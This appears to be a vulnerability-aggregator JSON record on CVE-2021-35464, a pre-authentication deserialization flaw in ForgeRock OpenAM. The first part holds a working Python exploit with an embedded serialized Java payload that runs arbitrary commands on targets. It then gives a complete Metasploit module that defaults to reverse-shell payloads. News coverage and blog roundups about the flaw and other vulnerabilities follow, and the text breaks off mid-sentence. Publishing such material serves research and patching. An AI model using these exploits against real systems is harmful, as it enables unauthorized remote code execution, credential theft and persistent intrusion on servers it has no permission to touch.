xAPIMAPMA4AEABndpbmRvdwEAB2NtZC5leGUBAAIvYwEABy9iaW4vc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyDABHAPQMAPUA9gcA9wwA-AD5DABHAPoBAAJcQQwA-wD8DAD9AOAMAP4A_wEAJG9yZy5hcGFjaGUudG9tY2F0LnV0aWwuYnVmLkJ5dGVDaHVuawwBAAEBDAECAQMBAAhzZXRCeXRlcwwBBADoAQAHZG9Xcml0ZQEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24BABNqYXZhLm5pby5CeXRlQnVmZmVyAQAEd3JhcAEAE2phdmEvbGFuZy9FeGNlcHRpb24MAQUASAEAI3lzb3NlcmlhbC9wYXlsb2Fkcy9Ub21jYXRFY2hvSW5qZWN0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAFWphdmEvbGFuZy9UaHJlYWRHcm91cAEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQAQamF2YS9sYW5nL1RocmVhZAEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwEADmdldFRocmVhZEdyb3VwAQAZKClMamF2YS9sYW5nL1RocmVhZEdyb3VwOwEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAHZ2V0TmFtZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBAA1nZXRTdXBlcmNsYXNzAQAEc2l6ZQEAAygpSQEAFShJKUxqYXZhL2xhbmcvT2JqZWN0OwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdpc0VtcHR5AQADKClaAQAEVFlQRQEABChJKVYBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvTG93ZXJDYXNlAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAEbmV4dAEACGdldEJ5dGVzAQAEKClbQgEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEAEWdldERlY2xhcmVkTWV0aG9kAQAPcHJpbnRTdGFja1RyYWNlACEARQBGAAAAAAAEAAEARwBIAAEASQAAAC8AAQABAAAABSq3AAGxAAAAAgBKAAAABgABAAAAEQBLAAAADAABAAAABQBMAE0AAAABAE4ATwACAEkAAAA_AAAAAwAAAAGxAAAAAgBKAAAABgABAAAAYABLAAAAIAADAAAAAQBMAE0AAAAAAAEAUABRAAEAAAABAFIAUwACAFQAAAAEAAEAVQABAE4AVgACAEkAAABJAAAABAAAAAGxAAAAAgBKAAAABgABAAAAZgBLAAAAKgAEAAAAAQBMAE0AAAAAAAEAUABRAAEAAAABAFcAWAACAAAAAQBZAFoAAwBUAAAABAABAFUACABbAEgAAQBJAAAF7QAIABEAAAMDAzu4AAK2AANMAU0rtgAEEgW2AAZNLAS2AAcsK7YACMAACcAACU4DNgQVBC2-ogLNLRUEMjoFGQXHAAanArkZBbYACjoGGQYSC7YADJoADRkGEg22AAyaAAanApsZBbYABBIOtgAGTSwEtgAHLBkFtgAIOgcZB8EAD5oABqcCeBkHtgAEEhC2AAZNLAS2AAcsGQe2AAg6BxkHtgAEEhG2AAZNpwAWOggZB7YABLYAE7YAExIRtgAGTSwEtgAHLBkHtgAIOgcZB7YABLYAExIUtgAGTacAEDoIGQe2AAQSFLYABk0sBLYABywZB7YACDoHGQe2AAQSFbYABk0sBLYABywZB7YACMAAFsAAFjoIAzYJFQkZCLkAFwEAogHLGQgVCbkAGAIAOgoZCrYABBIZtgAGTSwEtgAHLBkKtgAIOgsZC7YABBIaA70AG7YAHBkLA70AHbYAHjoMGQu2AAQSHwS9ABtZAxIgU7YAHBkLBL0AHVkDEiFTtgAewAAgOgYZBsYBVxkGtgAimgFPGQy2AAQSIwS9ABtZA7IAJFO2ABwZDAS9AB1ZA7sAJVkRAMi3ACZTtgAeVxInuAAotgApEiq2AAyZABkGvQAgWQMSK1NZBBIsU1kFGQZTpwAWBr0AIFkDEi1TWQQSLlNZBRkGUzoNuwAvWbsAMFkZDbcAMbYAMrYAM7cANBI1tgA2tgA3tgA4Og4SObgAOjoPGQ-2ADs6BxkPEjwGvQAbWQMSPVNZBLIAJFNZBbIAJFO2AD4ZBwa9AB1ZAxkOU1kEuwAlWQO3ACZTWQW7ACVZGQ6-twAmU7YAHlcZDLYABBI_BL0AG1kDGQ9TtgAcGQwEvQAdWQMZB1O2AB5XpwBOOg8SQbgAOjoQGRASQgS9ABtZAxI9U7YAPhkQBL0AHVkDGQ5TtgAeOgcZDLYABBI_BL0AG1kDGRBTtgAcGQwEvQAdWQMZB1O2AB5XBDsamQAGpwAJhAkBp_4vGpkABqcAEacACDoFpwADhAQBp_0ypwAISyq2AESxAAgAlwCiAKUAEgDFANMA1gASAhUCiAKLAEAAMAA7Au8AQwA-AFkC7wBDAFwAfALvAEMAfwLpAu8AQwAAAvoC_QBDAAMASgAAAQYAQQAAABUAAgAWAAkAFwALABgAFQAaABoAGwAmABwAMAAeADYAHwA-ACAARQAhAFwAIgBnACMAbAAkAHQAJQB_ACYAigAnAI8AKACXACoAogAtAKUAKwCnACwAuAAuAL0ALwDFADEA0wA0ANYAMgDYADMA4wA1AOgANgDwADcA-wA4AQAAOQEOADoBHQA7ASgAPAEzAD0BOAA-AUAAPwFZAEABfwBBAYwAQgG3AEMB8gBEAhUARgIcAEcCIwBIAmYASQKIAE4CiwBKAo0ASwKUAEwCtABNAtYATwLYAFEC3wA6AuUAUwLsAFYC7wBUAvEAVQL0ABwC-gBaAv0AWAL-AFkDAgBbAEsAAADeABYApwARAFwAXQAIANgACwBcAF0ACAIcAGwAXgBfAA8ClABCAF4AXwAQAo0ASQBgAGEADwHyAOYAYgBjAA0CFQDDAGQAZQAOASgBtwBmAGcACgFAAZ8AaABnAAsBWQGGAGkAZwAMAREB1ABqAGsACQA2ArYAbABtAAUARQKnAG4AbwAGAHQCeABwAGcABwEOAd4AcQByAAgC8QADAFwAcwAFACkC0QB0AGsABAACAvgAdQB2AAAACQLxAHcAeAABAAsC7wB5AHoAAgAmAtQAewB8AAMC_gAEAFwAcwAAAH0AAACoABf_ACkABQEHAH4HAH8HAAkBAAD8ABQHAID8ABoHAIEC_AAiBwCCZQcAgxJdBwCDDP0ALQcAhAH-AMsHAIIHAIIHAIJSBwCF_wCaAA8BBwB-BwB_BwAJAQcAgAcAgQcAggcAhAEHAIIHAIIHAIIHAIUHAD0AAQcAhvsASvkAAfgABvoABf8ABgAFAQcAfgcAfwcACQEAAEIHAIcE_wAFAAAAAEIHAIcEAAEAiAAAAAIAiXVxAH4AJAAAAdjK_rq-AAAANAAbCgADABUHABcHABgHABkBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElubmVyQ2xhc3NlcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHABoBACN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAEAAQAKAAsAAQAMAAAAMwABAAEAAAAFKrcAAbEAAAACAA0AAAAKAAIAAACUAAQAlQAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHNyABRqYXZhLm1hdGguQmlnSW50ZWdlcoz8nx-pO_sdAwAGSQAIYml0Q291bnRJAAliaXRMZW5ndGhJABNmaXJzdE5vbnplcm9CeXRlTnVtSQAMbG93ZXN0U2V0Qml0SQAGc2lnbnVtWwAJbWFnbml0dWRldAACW0J4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHD_______________7____-AAAAAXVxAH4AJAAAAAEBeHg$'\r\n\r\n## Ignore unsigned certs, if any because OpenAM is default HTTP\r\nssl._create_default_https_context = ssl._create_unverified_context\r\n\r\ndef checkParams(options, args):\r\n if args: sHost = args[0]\r\n else:\r\n sHost = input('[?] Please enter the URL ['+sURL+'] : ')\r\n if sHost == '': sHost = sURL\r\n if not sHost[-1:] == '/': sHost += '/'\r\n if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost\r\n if options.command: sCMD = options.command\r\n else: sCMD = ''\r\n if options.proxy: sProxy = options.proxy\r\n else: sProxy = ''\r\n return (sHost, sCMD, sProxy)\r\n\r\ndef findEndpoint(oOpener, sHost, sProxy):\r\n def testEndpoint(sURL):\r\n oRequest = urllib.request.Request(sURL)\r\n if sProxy: oRequest.set_proxy(sProxy, 'http')\r\n try: oResponse = oOpener.open(oRequest, timeout = iTimeout)\r\n except: return False\r\n if oResponse.code == 200:\r\n if 'ForgeRock' in oResponse.read().decode(errors='ignore'):\r\n print('[+] Found potential vulnerable endpoint: ' + sURL)\r\n return True\r\n return False\r\n \r\n if testEndpoint(sHost + sEndpoint): return sHost + sEndpoint\r\n elif testEndpoint(sHost + 'openam/' + sEndpoint): return sHost + 'openam/' + sEndpoint\r\n elif testEndpoint(sHost + 'OpenAM/' + sEndpoint): return sHost + 'OpenAM/' + sEndpoint\r\n elif testEndpoint(sHost + 'openam/ccversion/Version'): return sHost + 'openam/ccversion/Version'\r\n elif testEndpoint(sHost + 'OpenAM/ccversion/Version'): return sHost + 'OpenAM/ccversion/Version'\r\n else: return ''\r\n\r\ndef testVuln(oOpener, sURL, sProxy):\r\n oResponse = runCmd(oOpener, sURL, sProxy, 'echo CVE-2021-35464')\r\n ## The response is actually not well formed HTTP, needs manual formatting\r\n bResp = bytearray(15) ## \"CVE-2021-35464\\n\" should be 15 bytes\r\n try: oResponse.readinto(bResp)\r\n except: pass\r\n #print(bResp.split(b'\\x00')[0])\r\n if 'CVE-2021-35464' in bResp.decode(): return True\r\n else: return False\r\n\r\ndef runVuln(oOpener, sURL, sProxy, sCMD):\r\n oResponse = runCmd(oOpener, sURL, sProxy, sCMD)\r\n ## The response is actually not well formed HTTP, needs manual formatting\r\n bResp = bytearray(4096)\r\n try: oResponse.readinto(bResp)\r\n except: pass ## The readinto still should have worked\r\n sResp = bResp.split(b'\\x00')[0].decode()\r\n print(sResp)\r\n\r\ndef runCmd(oOpener, sURL, sProxy, sCMD):\r\n oData = b'jato.pageSession=' + strSerializedPayload\r\n oHeaders = {'cmd' : sCMD}\r\n oRequest = urllib.request.Request(url = sURL, headers = oHeaders, data = oData)\r\n if sProxy: oRequest.set_proxy(sProxy, 'http')\r\n return oOpener.open(oRequest, timeout = iTimeout)\r\n\r\ndef main():\r\n usage = (\r\n 'usage: %prog [options] URL \\n'\r\n 'Example: CVE-2021-35464.py -c id http://192.168.0.100:7080/openam\\n'\r\n 'Example: CVE-2021-35464.py -c dir -p 127.0.0.1:8080 http://192.168.0.100:7080/openam\\n'\r\n 'When in doubt, just enter a single IP address'\r\n )\r\n\r\n parser = optparse.OptionParser(usage=usage)\r\n parser.add_option('--command', '-c', dest='command', help='Optional: The command to run remotely')\r\n parser.add_option('--proxy', '-p', dest='proxy', help='Optional: HTTP proxy to use, e.g. 127.0.0.1:8080')\r\n \r\n ## Get or ask for the vars\r\n (options, args) = parser.parse_args()\r\n (sHost, sCMD, sProxy) = checkParams(options, args)\r\n \r\n ## Verify reachability\r\n print('[!] Verifying reachability of ' + sHost)\r\n oOpener = urllib.request.build_opener()\r\n oRequest = urllib.request.Request(sHost)\r\n if sProxy: oRequest.set_proxy(sProxy, 'http')\r\n try: oResponse = oOpener.open(oRequest, timeout = iTimeout)\r\n except urllib.error.HTTPError: pass\r\n except: sys.exit('[-] Error, host ' + sHost + ' seems to be unreachable')\r\n print('[+] Endpoint ' + sHost + ' reachable')\r\n\r\n ## Find endpoint\r\n print('[!] Finding correct OpenAM endpoint')\r\n sEndpoint = findEndpoint(oOpener, sHost, sProxy)\r\n if sEndpoint == '': sys.exit('[-] Error finding the correct OpenAM endpoint or not vulnerable.')\r\n\r\n ## Verify vulnerability\r\n if testVuln(oOpener, sEndpoint, sProxy): print('[+] !SUCCESS! Host ' + sHost + ' is vulnerable to CVE-2021-35464')\r\n else: sys.exit('[-] Not vulnerable or this implementation does not work')\r\n if sCMD:\r\n print('[+] Running command \"' + sCMD + '\" now:\\n')\r\n runVuln(oOpener, sEndpoint, sProxy, sCMD)\r\n else: print('[!] All done')\r\n\r\nif __name__ == \"__main__\":\r\n main()", "sourceHref": "https://www.exploit-db.com/download/50131", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2021-07-13T06:32:51", "description": "[](<https://thehackernews.com/images/-zeuNR0e1nAc/YO0Yqt-mCXI/AAAAAAAADKU/ejPIO9qgMoQfOCjx-hLwFaExyDGlCuYcgCLcBGAsYHQ/s0/cyber-attack.jpg>)\n\nCybersecurity agencies in Australia and the U.S. are [warning](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/12/critical-forgerock-access-management-vulnerability>) of an actively exploited vulnerability impacting ForgeRock's OpenAM access management solution that could be leveraged to execute arbitrary code on an affected system remotely.\n\n\"The [Australian Cyber Security Centre] has observed actors exploiting this vulnerability to compromise multiple hosts and deploy additional malware and tools,\" the organization [said](<https://www.cyber.gov.au/acsc/view-all-content/alerts/forgerock-open-am-critical-vulnerability>) in an alert. ACSC didn't disclose the nature of the attacks, how widespread they are, or the identities of the threat actors exploiting them.\n\n[](<https://go.thn.li/1-free-728-9> \"Stack Overflow Teams\" )\n\nTracked as [CVE-2021-35464](<https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464>), the issue concerns a pre-authentication remote code execution (RCE) vulnerability in ForgeRock Access Manager identity and access management tool, and stems from an [unsafe Java deserialization](<https://owasp.org/www-project-top-ten/2017/A8_2017-Insecure_Deserialization>) in the Jato framework used by the software.\n\n[](<https://thehackernews.com/images/-jHyqkCxvcEM/YO0Zd0DMD6I/AAAAAAAADKc/qYv_O8aDk0oaueJuF_mWtS1_IM5ILQHrgCLcBGAsYHQ/s0/flaw.jpg>)\n\n\"An attacker exploiting the vulnerability will execute commands in the context of the current user, not as the root user (unless ForgeRock AM is running as the root user, which is not recommended),\" the San Francisco-headquartered software firm [noted](<https://backstage.forgerock.com/knowledge/kb/article/a47894244>) in an advisory.\n\n[](<https://go.thn.li/auth_300> \"Enterprise Password Management\" )\n\n\"An attacker can use the code execution to extract credentials and certificates, or to gain a further foothold on the host by staging some kind of shell (such as the common implant Cobalt Strike),\" it added.\n\n[](<https://thehackernews.com/images/-3Yo5aIFJQoQ/YO0UmCqIAmI/AAAAAAAADKM/vFnroWDPaoka4Yfx0t-TaeE3B1H0tfEzgCLcBGAsYHQ/s0/ForgeRock-vulnerability.jpg>)\n\nThe vulnerability affects versions 6.0.0.x and all versions of 6.5, up to and including 6.5.3, and has been addressed in version AM 7 released on June 29, 2021. ForgeRock customers are advised to move quickly to deploy the patches to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2021-07-13T04:48:00", "type": "thn", "title": "Critical RCE Flaw in ForgeRock Access Manager Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-35464"], "modified": "2021-07-13T04:52:02", "id": "THN:6510A3250EDBD304F93AA770592A8D14", "href": "https://thehackernews.com/2021/07/critical-rce-flaw-in-forgerock-access.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2021-07-13T16:10:40", "description": "", "cvss3": {}, "published": "2021-07-13T00:00:00", "type": "packetstorm", "title": "ForgeRock / OpenAM Jato Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-35464"], "modified": "2021-07-13T00:00:00", "id": "PACKETSTORM:163486", "href": "https://packetstormsecurity.com/files/163486/ForgeRock-OpenAM-Jato-Java-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'ForgeRock / OpenAM Jato Java Deserialization', \n'Description' => %q{ \nThis module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and \naccess management solution. The vulnerability arises from a Java deserialization flaw in OpenAM\u2019s \nimplementation of the Jato framework and can be triggered by a simple one-line GET or POST request to a \nvulnerable endpoint. Successful exploitation yields code execution on the target system as the service user. \n \nThis vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus \nis susceptible to the same issue. \n}, \n'Author' => [ \n'Michael Stepankin', # Original Discovery and PoC \n'bwatters-r7', # Msf module \n'Spencer McIntyre', # All of the Help \n'jheysel-r7' # Check Method \n], \n'References' => [ \n['CVE', '2021-35464'], \n['URL', 'https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464'], \n['URL', 'https://backstage.forgerock.com/knowledge/kb/article/a47894244'] \n], \n'DisclosureDate' => '2021-06-29', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_python_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 1, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \nregister_options([ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [true, 'Base path', '/openam']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/oauth2/..;/ccversion/Version'), \n'vars_post' => { \n'jato.pageSession' => Base64.urlsafe_encode64(rand_text_alphanumeric(6..13)) \n} \n) \nif res.nil? \nCheckCode::Unknown(\"The target server didn't respond!\") \nelsif res.code == 302 && res.headers['Location']&.end_with?('/base/AMInvalidURL') \nCheckCode::Appears \nelse \nCheckCode::Safe \nend \nend \n \ndef execute_command(cmd, _opts = {}) \ncmd_encapsulated = \"bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash\" \nysoserial_payload = Msf::Util::JavaDeserialization.ysoserial_payload('Click1', cmd_encapsulated, modified_type: 'none') \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/oauth2/..;/ccversion/Version'), \n'vars_post' => { \n'jato.pageSession' => Base64.urlsafe_encode64(\"\\x00\" + ysoserial_payload) \n} \n) \nunless res && res.code == 302 \nfail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\") \nend \nprint_good(\"Successfully executed command: #{cmd}\") \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163486/cve_2021_35464_forgerock_openam.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "avleonov": [{"lastseen": "2021-08-03T08:35:33", "description": "Hello guys! The second episode of Last Week\u2019s Security news from June 28 to July 4.\n\nThe most interesting vulnerability of the last week is of course [Microsoft Print Spooler "PrintNightmare"](<https://www.tenable.com/blog/cve-2021-1675-proof-of-concept-leaked-for-critical-windows-print-spooler-vulnerability>). By [sending an RpcAddPrinterDriverEx() RPC request](<https://www.kb.cert.org/vuls/id/383432>), for example over SMB, a remote, authenticated attacker may be able to execute arbitrary code with SYSTEM privileges on a vulnerable Windows system. And there is a public PoC exploit for this vulnerability published by the Chinese security firm Sangfor. And there is some strange story. It turns out that Sangfor published an exploit for the 0day vulnerability. But they thought this vulnerability (CVE-2021-1675) had already been patched as part of the June Micorosft Patch Tuesday. And then it turns out that this is a bug in the Microsoft patch. But Microsoft wrote that this is a different, new vulnerability CVE-2021-34527 and so there were no problems with the previous patch. In any case, a patch for this vulnerability has not yet been released and [Microsoft is suggesting two Workarounds](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). Option 1 - Disable the Print Spooler service, Option 2 - Disable inbound remote printing through Group Policy. Do this first for Domain Controllers and other critical Windows servers. All versions of Windows contain the vulnerable code and are susceptible to exploitation. Also note that the new vulnerability has a flag Exploitation Detected on the MS site. \n\nThe most interesting attack of the week is [Kaseya VSA Supply-Chain Attack](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689>). Kaseya Limited is an American software company that develops software for managing networks, systems, and information technology infrastructure. [Kaseya VSA](<https://www.kaseya.com/products/vsa/>) (Virtual System Administrator) is a cloud-based MSP (Managed Service Provider) platform that allows providers to perform patch management and client monitoring for their customers. So, REvil gang used around [30 MSPs across the US, AUS, EU, and LATAM where Kaseya VSA was to encrypt over 1,000 businesses](<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>). It is now believed that this was an attack on on-premises VSA servers using SQL injection and authentication bypass vulnerabilities. Well, by agreeing to use the MSP, be prepared for such surprises.\n\nContinuing the topic of vulnerabilities in services that simplify system administration, Finnish cybersecurity company Nixu [has published a writeup for Remote Code Execution](<https://www.nixu.com/blog/remote-code-execution-vulnerability-microsoft-intune-managed-windows-devices>) vulnerability in Microsoft Intune managed Windows devices ([CVE-2021-31980](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31980>)) from June Patch Tuesday. "This proof-of-concept shows that remote attackers can run code with system privileges on a Windows machine by intercepting the TLS connections. This vulnerability could be exploited to install malware to the victim\u2019s machine to take persistent full control over it". Intune Management Extension updates itself without any user action when the computer is connected to internet. But computers not connected to internet might still run the vulnerable version on startup.\n\nI liked the [new Metasploit module](<https://vulners.com/metasploit/MSF:EXPLOIT/LINUX/LOCAL/DOCKER_RUNC_ESCAPE/>) that leverages a flaw in `runc` to escape a Docker container and get command execution on the host as root. It overwrites the `runc` binary with the payload and wait for someone to use `docker exec` to get into the container.\n\nAnd I want to mention these vulnerabilities: \n\n * [Microsoft Translation Bugs Open Edge Browser to Trivial UXSS Attacks.](<https://threatpost.com/microsoft-edge-browser-uxss-attacks/167389/>) "Remotely inject and execute arbitrary code on any website just by sending a message".\n * [Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464)](<https://blog.rapid7.com/2021/06/30/forgerock-openam-pre-auth-remote-code-execution-vulnerability-what-you-need-to-know/>) in ForgeRock Access Manager.\n * The vulnerability in Windows 10 allows a low-privileged user to [wipe out arbitrary files needed for UEFI boot](<https://www.thezdi.com/blog/2021/6/30/cve-2021-26892-an-authorization-bypass-on-the-microsoft-windows-efi-system-partition>).\n * [Western Digital's older network-attached storage systems](<https://www.darkreading.com/attacks-breaches/mybook-investigation-reveals-attackers-exploited-legacy-0-day-vulnerabilities/d/d-id/1341440>) allowed unauthenticated commands to trigger a factory reset, formatting the hard drives.\n * Microsoft Discloses [Critical Bugs Allowing Takeover](<https://thehackernews.com/2021/06/microsoft-discloses-critical-bugs.html>) of [NETGEAR Routers](<https://www.netgear.com/support/product/DGN2200v1.aspx>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-05T15:19:07", "type": "avleonov", "title": "Last Week\u2019s Security news: PrintNightmare, Kaseya, Intune, Metasploit Docker escape", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26892", "CVE-2021-31980", "CVE-2021-34527", "CVE-2021-35464"], "modified": "2021-07-05T15:19:07", "id": "AVLEONOV:30285D85FDB40C8D55F6A24D9D446ECF", "href": "http://feedproxy.google.com/~r/avleonov/~3/iv5hnOt7XD8/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:34:07", "description": "Hello guys! The fourth episode of Last Week\u2019s Security news, July 12 \u2013 July 18.\n\nI would like to start with some new public exploits. I think these 4 are the most interesting.\n\n * If you remember, 2 weeks ago I mentioned the ForgeRock Access Manager and OpenAM vulnerability (CVE-2021-35464). Now there is a [public RCE exploit](<https://vulners.com/packetstorm/PACKETSTORM:163525>) for it. ForgeRock OpenAM server is a popular access management solution for web applications. [Michael Stepankin, Researcher](<https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464>): "In short, RCE is possible thanks to unsafe Java deserialization in the Jato framework used by OpenAM". And now this vulnerability [is Under Active Attack](<https://thehackernews.com/2021/07/critical-rce-flaw-in-forgerock-access.html>). "The [Australian Cyber Security Centre] has observed actors exploiting this vulnerability to compromise multiple hosts and deploy additional malware and tools," the organization said in an alert. ACSC didn't disclose the nature of the attacks, how widespread they are, or the identities of the threat actors exploiting them".\n * [A new exploit for vSphere Client](<https://vulners.com/packetstorm/PACKETSTORM:163487>) (CVE-2021-21985). The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.\n * [Apache Tomcat 9.0.0.M1 - Open Redirect](<https://vulners.com/exploitdb/EDB-ID:50118>) (CVE-2018-11784). "When the default servlet in Apache Tomcat [\u2026] returned a redirect to a directory [\u2026] a specially crafted URL could be used to cause the redirect to be generated to any URI of the attackers choice".\n * [Apache Tomcat 9.0.0.M1 - Cross-Site Scripting](<https://vulners.com/exploitdb/EDB-ID:50119>) (CVE-2019-0221). "The SSI printenv command in Apache Tomcat [\u2026] echoes user provided data without escaping and is, therefore, vulnerable to XSS". However, in real life this is unlikely to be used. "SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website".\n\nFor the last 2 weeks I have mentioned PrintNightmare and Kaseya. These topics seem to be coming to their logical end. But there is still something to tell about them.\n\n * 